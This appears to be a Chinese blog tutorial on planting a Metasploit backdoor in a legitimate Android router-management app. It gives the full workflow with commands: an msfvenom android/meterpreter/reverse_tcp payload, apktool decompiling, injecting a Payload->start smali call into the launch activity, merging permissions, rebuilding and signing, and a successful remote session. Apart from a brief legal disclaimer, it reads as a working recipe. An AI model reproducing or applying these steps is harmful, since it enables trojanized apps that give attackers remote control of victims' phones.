android反编译工具mercury,手动给APP添加backdoor(msf)

本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!!

77a7ffe7ad4d6d63dccb4b1761c6326f.png

前期的准备某路由器管理APP(luyou.apk)

kali Linux

手机(android 10)

01 生成Android shell

在生成之前,确定本机的ip地址。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk

这样我们便生成了一个名为66.apk的android shell

b2b983cf049d1d3c603f9a6ec6e81172.png

02 反编译刚才生成的shell和正常appapktool d 66.apk

apktool d luyou.apk

b2b983cf049d1d3c603f9a6ec6e81172.png

反编译后的效果

7394243705a55b30140fd0273f7516e1.png

03 注入PAYLOAD

-1 进入luyou文件夹,打开AndroidManifest.xml文件

-2 搜索关键字Launch和Main找到所对应启动的smail文件,说白了就是找app启动文件路径

66c6edda229efec81f8aa2e98eceb368.png

当前的启动路径为:com/mercury/mercuryrouterLaunchActivity

打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

928f2ddc62303483c63f568f1a14a1a9.png

04 将木马文件中的smali文件复制到载体smali文件夹中cp -r 66/smali/com/* luyou/smali/com/

05添加权限

打开木马AndroidManifest.xml文件

复制以

开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中,删除重复权限就ok

e6fa4a102b61416f2fc888674530dab9.png

06回遍apktool b luyou

7394243705a55b30140fd0273f7516e1.png

07签名

这样我们的app添加就算完成了,但是在手机是无法运行的。因为没有签名。

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

签名:jarsigner -keystore mykey.keystore luyou.apk alias_name -s

08 测试

安装app

e9df302e934a789f37ede2d6362c0407.png

msf终端成功上线

d3cd610c71215d6b2530c81e01a7ba70.png

版权属于:逍遥子大表哥

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值